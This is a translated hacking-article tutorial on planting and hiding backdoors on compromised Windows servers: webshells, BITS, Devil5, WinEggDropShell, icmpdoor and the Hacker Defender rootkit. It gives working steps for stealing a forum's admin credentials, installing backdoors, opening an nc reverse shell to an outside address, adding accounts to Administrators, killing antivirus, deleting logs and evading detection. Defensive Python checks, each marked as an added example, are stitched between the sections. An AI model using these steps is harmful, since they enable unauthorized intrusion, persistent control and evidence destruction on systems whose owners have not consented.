Keep Your Bots from Escaping Wuzhishan: High-Quality Backdoor Programs and Ideas

Source: Internet
Author: User
Tags: md5, encryption, root access
What is a backdoor?
A backdoor program, also called a Trojan horse, is used on a computer to collect information or to make it easier for an intruder to get in. The biggest difference between a backdoor and a computer virus is that a backdoor does not necessarily replicate itself; that is, a backdoor may not "infect" other computers.
A backdoor is a way to log on to the system. It not only bypasses the existing security settings of the system, but also can defeat various enhanced security settings on the system.
Backdoors range from the simple to the fancy. A simple backdoor may only create a new account or take over a rarely used one. A complicated backdoor (Trojans included) may bypass the system's security authentication and obtain secure access to the system; for example, a modified login program that grants administrator access when a specific password is entered.
Backdoors can be chained together, a technique many hackers use. For example, a hacker may crack one or more accounts and passwords, create one or more accounts of their own, and then, once on the system, use some technique or a system vulnerability to escalate privileges. They may modify a small part of the system configuration to weaken the system's defenses, or install a Trojan that opens a security hole in the system, so that the hacker ends up fully controlling it.
The above is the usual explanation of "backdoors" found on the Internet. In fact it can be summed up in one simple sentence: a backdoor is something left in a computer system, for special use, that lets you control that system in some special way! Obviously, mastering backdoor technology is an indispensable basic skill for every network security enthusiast! It lets your bots stay put and never fly out of your fingers!
Based on my years of experience in network security, I will explain to the many beginners in this field the types, usage and tricks of the backdoors (webshells included) that are commonly used on the Internet. I hope you learn the best techniques in the shortest time and improve your network security skills!

Backdoor Classification
Backdoors can be classified in many ways, and different standards give different categories. To make things easy to understand, we will classify backdoors by the technology they use:
1. webshell
This type of backdoor runs under the server's normal web service and builds its own way of being reached, such as the very popular ASP and CGI script backdoors.
2. Thread-inserted backdoor
The backdoor program is inserted into a system service or a thread of another program. The principle behind these backdoors has been described in "Hacker Defense"; interested readers can look it up. This is also the most popular backdoor technology today.
3. Extended Backdoor
"Extended" here means a major expansion of functionality, making it more useful than an ordinary single-function backdoor. Such a backdoor is in effect a small security toolkit that implements many resident functions, and it suits new users. However, the more powerful it is, the more reservations I have about it; the specific view depends on your preferences.
4. c/s Backdoor
Similar to the traditional Trojan program, a client/server interface is used: the backdoor is started on the server and controlled through a specific access method.
5. Rootkit
It may not be appropriate to list this as a separate class. However, the appearance of rootkits greatly changed the way people think about backdoor programs; a good rootkit is a complete system killer! We will talk about this aspect in the next article, and it will not disappoint anyone!
The above classification is based on technology. Apart from this, programmers also commonly classify backdoors as forward or reverse, but most users need not think about it that much. What we value is just the function!
Intrusion Methods: Boutique Backdoors

I guess everyone is tired of the "nonsense" above? Well, let's take a look at what the backdoors on the Internet look like. For those learning network security who want to improve, this is a great way to keep your bots from escaping your Wuzhishan!

1. webshell
Recently, attacks against system vulnerabilities on the network have gradually become fewer. Once the importance of network security was recognized, the simplest but most effective protection, upgrading, was accepted by everyone, so the survival cycle of system vulnerabilities in the coming years will get shorter and shorter. Judging by the recent trend, script vulnerabilities have gradually taken over the position that system vulnerabilities used to hold: many people have started studying them, and SQL injection has become the top concern of the major security sites. When it comes to scripts and web shells, the most important thing to say is that the mainstream intrusion approach in China today is to first use a script vulnerability to upload a script backdoor, then browse the server's installed software and programs to find a way to elevate privileges, and finally obtain system privileges on the server.
ASP, CGI and PHP scripts are all widely used on the Internet, so script backdoors have developed along these three lines. We will explain them one by one:
Haiyang top ASP Trojan
This is the most widely used webshell for ASP scripts. After several major revisions it has spawned powerful and easy-to-use backdoors such as the "Haiyang top ASP Trojan XP version" and the "Haiyang top ASP Trojan pink beauty version"; anyone who has followed script security will not be unfamiliar with them.
Type: web page Trojan
Scope of use: servers supporting ASP and web access
Concealment: ★★★★☆
Difficulty: ★☆☆☆☆
Hazard level: ★★★☆☆
Difficulty in killing: ★★★☆☆
Current server configurations are relatively secure and there are very few chances to use public system vulnerabilities, so script vulnerabilities have taken off. First, we obtain page-level access to a server in some way (for example, after SQL injection we get the ASP system's upload privilege, and the physical path of the server is known, so we upload the program). Then we simply upload the ASP program or copy the Haiyang code directly, and by accessing this program through the web we can conveniently view the information on the server. Here is a simple example (it is neither difficult nor unusual, since this is just a simple introduction; I hope you understand).
Example
Leadbbs 2.77 has been popular on the Internet. It is a typical ASP forum, and it patched many places where SQL could be injected. However, many careless administrators prefer to install it with the defaults and then open the forum; we only need to enter WWW.***.COM/BBS/data/leadbbs.MDB in IE to download the forum's database directly, and the passwords in it are not MD5-hashed! We can find the administrator's account and password directly, log on to the forum, go to the management interface, and replace forum ASP files such as "Contact Us" and "help" with our Haiyang code. Then we execute CMD commands with guest privileges, upload/download programs and run programs remotely with ease, and a hidden backdoor is created! You can obtain system privileges on the server in your own way.
In general, the functions of Haiyang are very powerful and it is not easy to scan out (a friend uses a script vulnerability to upload a webshell, uploads another backdoor to a hidden path through Haiyang, then deletes the first Haiyang copy through the backdoor uploaded last, so that the backdoor's storage path can be very deep and hard for an ordinary administrator to find). If administrators suspect a backdoor like this is in use, they can restore their page system from the forum backup, check the system using system logs, forum logs and similar records, open any suspicious ASP file to inspect it (the Haiyang code is easy to recognize), and then delete it.
Script webshells also exist for CGI and PHP, which work on similar principles, so we will not introduce them further here. These webshells are also included on the Hacker Defense forum; you can download and study them on your own.
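The two defensive checks suggested for Haiyang above, restoring pages from a known-good copy and opening suspicious ASP files, both reduce to comparing the web root against a baseline. The following is an added example (not code from the original article or from any tool it names) that builds a SHA-256 baseline of a web root, reports script files that changed or appeared since the baseline, and lists database files stored where the web server could serve them (the leadbbs.mdb case). All paths and file contents are constructed in a temporary directory; the names `snapshot`, `diff_snapshots`, `suspicious_script_changes`, `exposed_databases` and `demo` are this example's own.

```python
"""Web-root integrity check: flag modified or newly added script files and
database files exposed under the web root.  Added example, not from the
original article; paths and file contents are constructed in a temp dir."""
import hashlib
import os
import tempfile

SCRIPT_EXT = {".asp", ".asa", ".cgi", ".php", ".pl"}
DB_EXT = {".mdb", ".mda", ".mde"}


def _sha256(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(root):
    """Map relative path (forward slashes) -> sha256 for every file under root."""
    out = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            out[rel] = _sha256(full)
    return out


def diff_snapshots(baseline, current):
    """Return (modified, added, removed) relative paths, each sorted."""
    modified = sorted(p for p in baseline if p in current and baseline[p] != current[p])
    added = sorted(p for p in current if p not in baseline)
    removed = sorted(p for p in baseline if p not in current)
    return modified, added, removed


def suspicious_script_changes(baseline, current):
    """Script files that changed or appeared since the baseline was taken."""
    modified, added, _ = diff_snapshots(baseline, current)
    return sorted(p for p in modified + added
                  if os.path.splitext(p)[1].lower() in SCRIPT_EXT)


def exposed_databases(root):
    """Database files kept under the web root: downloadable by URL if the web
    server serves them, so they should be moved out or access-denied."""
    return sorted(p for p in snapshot(root)
                  if os.path.splitext(p)[1].lower() in DB_EXT)


def demo():
    """Constructed scenario: a forum's help.asp is replaced and a new script is
    dropped deep in the tree; the forum database sits under the web root."""
    root = tempfile.mkdtemp(prefix="webroot_")

    def write(rel, data):
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as f:
            f.write(data)

    write("bbs/help.asp", b"<% Response.Write \"help\" %>")
    write("bbs/contact.asp", b"<% Response.Write \"contact\" %>")
    write("bbs/data/leadbbs.mdb", b"constructed stand-in for a database file")
    baseline = snapshot(root)            # taken right after deployment
    write("bbs/help.asp", b"<% ' constructed stand-in for a replaced page %>")
    write("bbs/images/x/y/z.asp", b"<% ' constructed stand-in for a new file %>")
    current = snapshot(root)
    return suspicious_script_changes(baseline, current), exposed_databases(root)


if __name__ == "__main__":
    changed, databases = demo()
    print("changed/new scripts:", changed)
    print("database files under web root:", databases)
```

The baseline has to be taken from a known-good state (right after deployment, or the backup the text mentions) and stored off the web server, otherwise the attacker who replaced help.asp can refresh the baseline too. Listing the database file is only the first step; the fix is to move it outside the web root or deny it in the web server configuration.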

2. Thread-inserted backdoors
First, let's briefly explain what a typical "thread insertion" backdoor is: this backdoor has no process of its own at runtime, and all its network operations are carried out through other application processes. In other words, even if the firewall installed on the controlled side has an "application access permission" function, such backdoors cannot be effectively warned about or intercepted, and the other party's firewall is rendered useless! This kind of backdoor is mainstream; it gives defenders a headache because it is hard to scan and kill. It also has powerful functions and is a must-have for intrusion attacks!
The model of this kind is Xiao Rong's BITS, which advocates sharing on the Chinese network. Since its release, BITS has topped the list in every security tool download area, and many friends use it with ease.

BITS
Type: system backdoor
Scope of use: Win2000/XP/2003
Concealment: ★★★★☆
Difficulty: ★★★☆☆
Hazard level: ★★★★☆
Difficulty in killing: ★★★★☆

BITS is actually short for Background Intelligent Transfer Service; in another sense, it inserts the backdoor into a typical thread without anyone noticing. It has the following features: it is not seen in the process manager; it opens no port in normal times and only acts as an undercover agent in the system. It provides two functions, forward connection and reverse connection. It is only applicable to Windows 2003/XP.
Example
First, we use 3389 to log on to the bot. Make sure you have system privileges, copy bits.dll to the server, and execute this CMD command:
rundll32.exe bits.dll,install
This activates BITS; the program identifies the user by a characteristic string, which is equivalent to your password. To uninstall: rundll32.exe bits.dll,uninstall
This is the simplest way to use it. Apart from its concealment, this backdoor has two major features worth noting: port reuse and forward/reverse connections. Many friends often hear these two terms but do not understand them. Port reuse means communicating and controlling over the system's normal TCP ports, such as 80 or 139. The advantage of such a backdoor is that it is very concealed: you do not need to open a port and do not expose your own access, because the communication itself looks like normal access to the system! The other is reverse connection, a common and classic concept in backdoors. Because outbound connections initiated from the server are usually not forbidden, many firewalls are helpless against this!
The forward connection of BITS is very simple; refer to its readme. This method works when the server has no firewall or similar measures and can be connected to easily. If there is a firewall, however, you need the following reverse-connection method:
1. Use NC to listen locally (for example, nc -l -p 1234).
2. Use NC to connect to any TCP port on the target host that its firewall allows (80/139/445 ...).
3. Enter the activation command: hkfx @ dancewithdoldolphin [rxell]: 1.1.1.1: 2222
The target host's cmd will then appear on port 2222 of the local NC listener, so the firewall is bypassed.
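Port reuse and reverse connections are described above from the attacker's side; from the defender's side both still leave a trace in the connection table: a listener owned by a process that has no business on that port, or an established connection to an outside address that this host initiated (local ephemeral port) from a service process such as svchost.exe. The following added example (not code from the article or from BITS) parses `netstat -ano`-style output and applies a simple allow-list policy to it. The sample lines, the PID-to-image map, the allowed-listener table and the internal network range are all constructed; `parse_netstat`, `is_internal` and `review` are this example's own names.

```python
"""Connection-table review for port reuse and reverse-connection symptoms.
Added example, not code from the article or from BITS; the netstat lines,
PID-to-image map, policy tables and internal network are all constructed."""
import ipaddress
import re

# Constructed sample in the column layout of `netstat -ano` on Windows:
# Proto  Local Address  Foreign Address  State  PID
SAMPLE_NETSTAT = """\
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       900
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING       1320
  TCP    192.0.2.10:3389        192.0.2.77:51022       ESTABLISHED     1320
  TCP    192.0.2.10:49210       203.0.113.5:2222       ESTABLISHED     900
  TCP    0.0.0.0:1234           0.0.0.0:0              LISTENING       2048
  UDP    0.0.0.0:123            *:*                                    1100
"""
# Constructed PID -> image name map, as `tasklist` would report it.
SAMPLE_PIDS = {4: "System", 900: "svchost.exe", 1100: "svchost.exe",
               1320: "svchost.exe", 2048: "svchost.exe"}

# Policy (constructed): which image may listen on which TCP port, which images
# may open outbound connections at all, and which networks count as "ours".
ALLOWED_LISTEN = {("System", 445), ("svchost.exe", 135), ("svchost.exe", 3389)}
OUTBOUND_ALLOWED_IMAGES = {"browser.exe", "updater.exe"}
INTERNAL_NETS = [ipaddress.ip_network("192.0.2.0/24")]
# Dynamic (client-side) port range; 49152+ on Vista and later, 1025-5000 on
# the Win2000/XP/2003 systems the article targets.
EPHEMERAL_START = 49152

LINE_RE = re.compile(r"^\s*(TCP|UDP)\s+(\S+)\s+(\S+)\s+([A-Z_]+)?\s*(\d+)\s*$")


def _split(addr):
    host, port = addr.rsplit(":", 1)
    return host, int(port) if port.isdigit() else 0


def parse_netstat(text):
    """Turn netstat -ano output into a list of connection dicts."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                      # header lines and blanks
        proto, local, foreign, state, pid = m.groups()
        lhost, lport = _split(local)
        fhost, fport = _split(foreign)
        rows.append({"proto": proto, "lhost": lhost, "lport": lport,
                     "fhost": fhost, "fport": fport,
                     "state": state or "", "pid": int(pid)})
    return rows


def is_internal(host):
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return True                       # "*" and similar placeholders
    return any(ip in net for net in INTERNAL_NETS)


def review(rows, pid_map):
    """Return (finding, image, detail) tuples in table order."""
    findings = []
    for r in rows:
        image = pid_map.get(r["pid"], "?")
        if r["proto"] == "TCP" and r["state"] == "LISTENING":
            if (image, r["lport"]) not in ALLOWED_LISTEN:
                findings.append(("unexpected-listener", image, r["lport"]))
        elif r["state"] == "ESTABLISHED" and r["lport"] >= EPHEMERAL_START:
            # a local ephemeral port means this host dialled out
            if not is_internal(r["fhost"]) and image not in OUTBOUND_ALLOWED_IMAGES:
                findings.append(("outbound-from-service", image,
                                 f"{r['fhost']}:{r['fport']}"))
    return findings


if __name__ == "__main__":
    for finding in review(parse_netstat(SAMPLE_NETSTAT), SAMPLE_PIDS):
        print(finding)
```

The inbound 3389 session from the internal address is not reported, since that is the administrator's own terminal session; the svchost.exe connection to an outside host on port 2222 and the stray listener on 1234 are. A port-reuse backdoor that rides on an existing allowed listener (80, 139) will not show up in this table at all, which is why the article rates that feature highly; catching it needs the cross-view and traffic checks discussed later rather than the connection table.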
Devil5
Type: system backdoor
Scope of use: Win2000/XP/2003
Concealment: ★★★★☆
Difficulty: ★★☆☆☆
Hazard level: ★★★★☆
Difficulty in killing: ★★★☆☆
Like BITS, Devil5 is also a thread-inserted backdoor. Unlike BITS, Devil5 lets you customize the port and the thread to insert into from a GUI, according to your own habits. It suits anyone with a certain understanding of how it is used; because the inserted thread is custom, it is harder to find and kill. Let's look at how it is used.
Example
The built-in configuration program editdevil5.exe is used to configure the backdoor. The key settings are the control port, the thread to insert into, the connection password and the time interval; the most important is the inserted thread, which is usually set to the system's own svchost. Then run the backdoor and you can control it.
We use Telnet to connect to the port, in the form Telnet ***. The difference from other backdoors is that there is no prompt after connecting, each command is executed separately, and you must enter the password every time. For example, if you lose the server's administrator account, you can activate guest and add it to the Administrators group, remembering to append "> password" to every command: net localgroup administrators guest /add > hkfx. Then you can control the server.
Obviously Devil5 has some defects compared with Rongge's BITS: it is hard to communicate and execute commands through the system's built-in ports, you have to enter the password each time, and nothing you type is echoed back, so mistakes are easy. But it has its own advantages: the inserted thread can be chosen freely (setting the IE thread as the insertion target, for example, makes it harder to find and kill); its author provides a dedicated detection tool, deldevil5.exe, to help defenders clean the system; and it can be renamed and bound at will, so it is more flexible than BITS ...... Choose whichever you like.
In addition, tools such as PortlessBackdoor are backdoors of the same kind, powerful but slightly less concealed. If you are interested, study them on your own.
3. Extended Backdoor
In a general sense, a so-called extended backdoor can be seen as one that integrates a lot of functions, so that the backdoor itself does many things and makes direct control of bots or servers convenient. These backdoors are very popular with beginners. They generally integrate functions such as file upload/download, system user detection, HTTP access, terminal installation, port opening and starting/stopping services; they are small toolkits with powerful functions.
WinEggDropShell
Type: system backdoor
Scope of use: Win2000/XP/2003
Concealment: ★★★★☆
Difficulty: ★★☆☆☆
Hazard level: ★★★★☆
Difficulty in killing: ★★★★☆
This backdoor is the representative extended backdoor. It offers the following distinctive features: process management (view processes, kill a process by name or PID); registry management (view, delete, add and so on); service management (stop, start, enumerate, configure); port-to-program association (fport); system restart, power-off and logout (reboot, poweroff, shutdown, logoff); password sniffing; terminal installation and modification of the terminal port; port redirection (multithreaded, with restriction on the connecting IP address); an HTTP service (multithreaded, with restriction on the connecting IP address); a socks5 proxy (two verification methods, with restriction on the connecting IP address); account cloning (clone) and clone detection (checkclone); enhanced findpassword (obtains the passwords of all logged-on users, including users who logged on remotely with cloned accounts); an HTTP proxy (fully anonymous, supporting OICQ, MSN, mIRC and other programs); and other auxiliary functions such as HTTP download, log deletion, system information, restoring common file associations and enumerating system accounts.
When this backdoor was released on the Internet, many people used it to replace the backdoor they had been using, and the praise kept coming. In fact, however, it departs from the original definition of a "backdoor": the more features you implement, the more problems you have to consider in the program's execution, hiding and stability, and one oversight leads to overall failure. Therefore we do not recommend using it where concealment is required.
Example
Before installation you must use the local editserver.exe program to configure the server in detail. The configuration covers the inserted thread, the password, and e-mail notification of the logon IP address; it is not hard to see that its functions are very powerful and its concealment is also very strong. Below are some common functions used in intrusions; I believe friends with intrusion experience will surely recognize its power:
Fport: lists processes and their ports. Used to find which ports belong to the programs running on the system; it can also detect common hidden backdoors.
Reboot: restarts the system. If you upload and run another backdoor program that needs a restart to work normally, use this command!
Shell: gets a DOS shell. Needless to say, you get a shell directly on the server or bot.
Pskill pid or program name: kills a specific process, such as anti-virus software or a firewall.
Execute program: runs a program in the background, such as a sniffer.
Http://ip/file name save file name: downloads a program; pull a backdoor straight from the Internet onto the server.
Installterm port: installs terminal services on a Win2k server that does not have them; it takes effect after a restart. The connection port can be customized, for example to use a port other than 3389.
Stopservice/startservice: stops or starts a system service, such as telnet.
Cleanevent: deletes the system logs.
Redirect: TCP data forwarding. This is an excellent function in a backdoor program: it can control intranet machines by forwarding data on a port, which is very useful during penetration!
Enumservice: lists information about all automatically started services, such as backdoors and Trojans.
Regedit: enters registry operation mode; users familiar with the registry finally find their gospel in a backdoor!
Findpassword: obtains the passwords of all logged-on users, much better than the commonly used findpass.
......
In general, WinEggDropShell is one of the most popular backdoor programs. After several large-scale modifications and upgrades by its author it has become stable. Of course its power is beyond question, but precisely because it is so powerful it is hard to avoid being killed and suspected, so many people using WinEggDropShell find that their bots fly away after a while. That is actually normal; don't be discouraged. In fact a very simple method can greatly improve its concealment, as described below.
Compared with WinEggDropShell, the functions of Winshell by exclusive Swordsman are not so comprehensive, but I recommend that beginners use Winshell rather than WinEggDropShell: apart from getting a shell, Winshell only includes commands for restarting and shutting down the server. Its functions are relatively simple, but it makes full use of the built-in cmd to execute commands, which is also very helpful for learning and mastering the system!
Winshell and wolf were both top backdoor programs in China in the early days, and their code is undoubtedly classic. Using these two backdoors as a beginner will teach you a lot about the system and a lot about intrusion ideas and methods.

4. C/S Backdoor
Traditional Trojan programs often use the C/S architecture, which is easy to control and to some extent avoids the "universal password" situation; this has contributed to the privatization of backdoors. The category is vague and many backdoors can be put into it. Icmpdoor, for example, is a clever one.
Icmpdoor
Type: system backdoor
Scope of use: Win2000/XP/2003
Concealment: ★★★★★
Difficulty: ★★★☆☆
Hazard level: ★★★★☆
Difficulty in killing: ★★★★★
This backdoor uses an ICMP channel for communication, so it opens no port at all; it uses the system's ICMP packets for control, installs itself as a system service and runs automatically at startup, so it can penetrate many firewalls. Obviously its biggest feature is that it opens no port and is controlled purely through ICMP! Compared with all the backdoor programs above, its control mode is very special, not even port 80 is used, and I have to admire the author's unique angle and vision in this respect!
Example
In fact, where this backdoor is used most is controlling intranet computers after the gateway has been broken, because a lot of confidential data is stored on intranet computers. The intranet computers here are not the bots we usually think of; it is a corporate network, which is not as easy to intrude into and control as the intranets we commonly meet, because the company itself involves network security services and its intranet PCs are well protected. After trying many backdoors, icmpdoor helped me penetrate the intranet successfully! As a result I fell in love with this backdoor.
First, install it with icmpsrv.exe -install, and then control the system with icmpsend.exe IP.
This backdoor uses a C/S architecture and must be activated with icmpsend. However, it also has an inherent disadvantage: it relies on ICMP for communication, and on today's network, after the baptism of the Shockwave (Blaster) worm, few servers still accept ICMP packets; many block them. So it is not a good way to control a server, which is why I use it to control intranet computers, where ICMP is rarely blocked!
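An ICMP-only control channel like icmpdoor's cannot be found by looking at ports, but it changes what the echo payloads look like on the wire. The following added example (not code from the article or from icmpdoor) classifies ICMP echo payloads with two heuristics a defender can apply to captured packets: whether the payload matches the fixed pattern the Windows and Linux ping utilities send, and whether its size, entropy or text content looks like a command channel. The sample payloads and the thresholds are constructed for illustration; `classify_echo`, `shannon_entropy` and `is_linux_ping_payload` are this example's own names.

```python
"""Heuristic classification of ICMP echo payloads.  Added example, not code
from the article or from icmpdoor; sample payloads and thresholds are
constructed."""
import math
from collections import Counter

# Fixed 32-byte payload sent by the Windows ping utility.
WINDOWS_PING_PAYLOAD = b"abcdefghijklmnopqrstuvwabcdefghi"
NORMAL_SIZES = {32, 56, 64}       # common default echo payload sizes
ENTROPY_LIMIT = 5.5               # bits per byte; constructed threshold
COMMAND_TOKENS = ("cmd", "net ", "dir ", "\\")


def shannon_entropy(data):
    """Bits of entropy per byte of `data` (0.0 for empty input)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def is_linux_ping_payload(payload):
    """Linux/BSD ping sends a timestamp (8 or 16 bytes) followed by the
    byte ramp 0x10, 0x11, 0x12, ... up to the requested size."""
    for ts_len in (8, 16):
        body = payload[ts_len:]
        if body and all(b == (0x10 + i) & 0xFF for i, b in enumerate(body)):
            return True
    return False


def classify_echo(payload):
    """Return 'normal-ping', 'unknown-pattern' or 'suspicious:<reasons>'."""
    if payload == WINDOWS_PING_PAYLOAD or is_linux_ping_payload(payload):
        return "normal-ping"
    reasons = []
    if len(payload) not in NORMAL_SIZES:
        reasons.append(f"unusual-size:{len(payload)}")
    if shannon_entropy(payload) > ENTROPY_LIMIT:
        reasons.append("high-entropy")          # packed or encrypted data
    text = payload.decode("ascii", errors="ignore").lower()
    if any(tok in text for tok in COMMAND_TOKENS):
        reasons.append("command-like-text")     # plaintext shell commands
    return "suspicious:" + ",".join(reasons) if reasons else "unknown-pattern"


# Constructed sample payloads: two genuine ping patterns, one plaintext
# command, one deterministic high-entropy blob standing in for encrypted data.
SAMPLE_PAYLOADS = {
    "windows-ping": WINDOWS_PING_PAYLOAD,
    "linux-ping": bytes(8) + bytes(range(0x10, 0x10 + 48)),
    "text-command": b"dir c:\\inetpub",
    "packed-blob": bytes((i * 37 + 11) % 256 for i in range(64)),
}


def classify_samples():
    return {name: classify_echo(p) for name, p in SAMPLE_PAYLOADS.items()}


if __name__ == "__main__":
    for name, verdict in classify_samples().items():
        print(f"{name:14s} {verdict}")
```

These checks run over packet captures or an IDS rule set, not on the host, which is the point: the article's own remark that many networks block ICMP after the worm outbreaks is the simplest mitigation, and where echo must be allowed, rate-limiting it and alerting on payloads that do not match the known ping patterns covers the rest.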
5. Rootkit
If all the backdoor programs above each have their merits, compared with the classic rootkit they are nothing more than toys. So what exactly is a rootkit?
Rootkits appeared in the early 1990s; the term rootkit was first used in a security advisory in February 1994. Since then, rootkit technology has developed rapidly and spread widely, making detection harder and harder. The largest number of rootkits exist for SunOS and Linux.
Many people misunderstand rootkits as tools for obtaining root access. In fact a rootkit is a tool for concealing one's own traces and retaining root access. Generally the attacker obtains root access through a remote attack; after entering the system, the attacker installs the rootkit on the compromised host and then often uses the rootkit's backdoor to check whether other users are logged on. If only the attacker is present, the attacker starts cleaning the relevant entries from the logs, and after collecting the users and passwords of other systems with the rootkit's sniffer, uses that information to access those systems.
The move from *nix to Windows carried all of these "terrible" features over! The common rootkits on the network are kernel-level backdoor software that can hide files, processes, system services, system drivers, registry keys and values and opened ports, and even fake the available disk space. At the same time the program disguises its changes in memory and silently controls the hidden processes. Install the program to hide the backdoor, register and hide the system service, and install the system driver. This backdoor technology allows implanted redirectors, which is a very difficult matter for many network administrators!
Hacker Defender
Type: system backdoor
Scope of use: Win2000/XP/2003
Concealment: ★★★★★
Difficulty: ★★★★★
Hazard level: ★★★★★
Difficulty in killing: ★★★★★ (Haha, all five stars, because it is too "overbearing")
The latest version of hxdef is 1.0.0. It is a program from abroad and contains two key programs. Its .ini configuration file is very complicated, and I believe it is also very hard for new users: [hiddentable], [rootprocesses], [hiddenservices], [hiddenregkeys], [hiddenregvalues], [startuprun], [freespace], [hiddenports], [settings]. These respectively hide files (and directories), hide processes, hide services, hide registry keys, hide registry values, run programs at startup, increase the reported free disk space, hide ports and set backdoor options. We will not go into the specific configuration; this article gives a description of its features (personal opinions and experience, so please bear with me):
(1) Communication over the system's normal TCP ports, such as 80, is not uncommon for advanced backdoors.
(2) A simple system shell can be obtained. This is enough for veterans who intrude into systems; extra functions are just cumbersome.
(3) Hidden ports. If you want to communicate over a non-standard TCP port, use this function and rest assured that nobody else can find it.
(4) Hide everything that could give the backdoor away! This can only be described in one word: Niu (awesome)! Hiding files, services, registry keys and so on: even after we have said it, a friend who has missed the point should still be able to see where the "NB" lies!
(5) The most classic backdoor idea in history: it works well together with other extended backdoors! (We will talk about this later.)
Setting everything else aside, once such a rootkit is installed in a system and cannot be detected by common detection and removal methods, it is worth using! Imagine a backdoor running on your server that you cannot even see, let alone scan for!
Note: killing and clearing it is very troublesome! Just reinstall the system!
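Every hiding function listed for hxdef above (files, processes, services, registry keys, ports) works by lying to the system's enumeration APIs. The classic counter is the cross-view diff: take the same list a second way that the rootkit does not hook (a raw walk of kernel structures, an external port scan against the host, a listing taken from an offline boot) and report whatever the API view is missing. The following is an added example (not code from the article or from any rootkit tool it names) of that comparison over constructed views; `hidden_objects` and `cross_view_report` are this example's own names, and the views themselves are constructed.

```python
"""Cross-view diff: objects present in an independent raw view but missing
from the API view are candidates for rootkit hiding.  Added example with
constructed views; nothing here talks to a real system."""


def hidden_objects(api_view, raw_view, key=lambda x: x):
    """Return items of raw_view whose key is absent from api_view, sorted by key."""
    api_keys = {key(item) for item in api_view}
    return sorted((item for item in raw_view if key(item) not in api_keys), key=key)


def cross_view_report(views):
    """views maps a category name to (api_view, raw_view[, key]).
    Returns {category: [hidden items]} only for categories where the two
    views disagree, so an empty dict means the views are consistent."""
    report = {}
    for category, spec in views.items():
        api_view, raw_view = spec[0], spec[1]
        key = spec[2] if len(spec) > 2 else (lambda x: x)
        hidden = hidden_objects(api_view, raw_view, key)
        if hidden:
            report[category] = hidden
    return report


# Constructed sample views for one host.  The API views are what a process
# list, `netstat -an` and the service manager report on the host itself; the
# raw views are what a kernel-structure walk, an external port scan and an
# offline registry read return.  Processes are keyed by PID.
SAMPLE_VIEWS = {
    "processes": ([(4, "System"), (900, "svchost.exe"), (1320, "svchost.exe")],
                  [(4, "System"), (900, "svchost.exe"), (1320, "svchost.exe"),
                   (2048, "hidden.exe")],            # constructed hidden process
                  lambda p: p[0]),
    "tcp_ports": ([135, 445, 3389],
                  [135, 445, 2222, 3389]),            # 2222 seen only from outside
    "services": (["Dhcp", "TermService", "W32Time"],
                 ["Dhcp", "TermService", "W32Time", "constructed_svc"]),
    "files": (["C:/Windows/system32/drivers/tcpip.sys"],
              ["C:/Windows/system32/drivers/tcpip.sys"]),   # views agree
}


def demo():
    return cross_view_report(SAMPLE_VIEWS)


if __name__ == "__main__":
    for category, hidden in demo().items():
        print(f"{category}: {hidden}")
```

The method only works when the second view is genuinely independent: a different tool that calls the same hooked API will agree with the first view and reveal nothing. That dependence on trusted enumeration is why the text's advice for a confirmed rootkit is to reinstall the system rather than try to clean it in place.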
Classic backdoor thinking
Many of my friends are now trying to develop their own backdoor programs, and they try to add a lot of features; they can't wait for a backdoor to become an operating system! Obviously, this is wrong! A good backdoor can have a very single function. It is not there to give you control over the server; it is there to regain control when you lose your usual way of controlling it! Therefore, do not use the backdoor frequently, and of course do not let your backdoor program become too popular.
All network security tools share one problem: hiding! As users' security awareness grows, anti-virus software and system protection programs are no longer rare "treasures". So even if your backdoor program implements twenty thousand features, it is useless if anti-virus software scans and kills it easily! In other words, if someone else can simply look at the process list, check the registry and check the ports and find that the system has a problem, you may never get to use this backdoor! So remember: hiding is the most important thing!
Many friends like to use one powerful backdoor program to control the server. It may be concealed, but once it is killed they can only watch the server and cry. In fact, we can solve the problem by thinking a little wider: nested use of complementary backdoor programs! In this way, once one backdoor is exposed, another backdoor or several are still on the server. This is very simple; it involves a lot of intrusion experience and methods, as well as rootkits. We will talk about it later.
On today's network, once a network security tool is published, it is uploaded to every corner of the network by security enthusiasts in a short time! Obviously the program then stays usable only briefly and will be scanned and killed within a few days. Therefore, all the programs listed in this article can be found on the network (and are included on the CD); I just want to give you a better idea and introduction. Many backdoors are private; I hope you write your own excellent backdoors through your own study!
Through the explanation above, I believe everyone now has a real understanding of the current mainstream backdoor programs. Because of the article's length, it cannot explain usage and removal in full practical detail; I believe readers would be bored and the article could not be published after review. The specific use will depend on you. Let's talk about some of the experience behind the classic backdoors.
First, let me flatter WTF a bit: this kid said last time in the Hacker Defense lab: "You must never get stuck in a mindset. We need to know that the most important thing in security is training one's thinking and cultivating awareness. To train everyone's thinking, we may remind you that there are many traps in the level! Never be fooled by surface phenomena!" Don't underestimate this sentence. Apply it to network defense and attack: a lot of thinking spreads out, which improves your overall level! Take our backdoors as an example: there are powerful and concealed backdoors above, so why are they scanned and killed less than three days after you install them on bots, while someone else installs them and uses them just fine? This is actually a sign of how important a change of thinking is. Next we will talk about how a backdoor program can be used with a good change of thinking and good use of its features. First, let's look at the misunderstandings of ordinary netizens:
(1) An ordinary security enthusiast breaks into a server through a common system vulnerability or other means, creates an account and adds it directly to the administrator group; if a bit more careful, they add a $ after the account name so that others won't notice it in cmd. Then they control the server through 3389 or 23 and sweat away! Is this what you learned from reading "Hacker Defense"? Is that how Hacker Defense taught you? Are all administrators stupid? Don't you think they check the most important accounts on the system? It would be a miracle if such a bot were not lost within a day!
(2) Control the server -> upload a backdoor -> open a specific port -> use the backdoor to control the server. In between, use a classic tool such as findpass to get the administrator's password, or provide services such as 3389 on the server ...... I have just one word for friends like this: dizzy! A simple netstat -an is all it takes to expose your connection! Just wait for the summons!
(3) Clone a built-in system account and use it to log on to the server. This is also undesirable; in my experience such a bot cannot be kept for long. It flies away within a week!
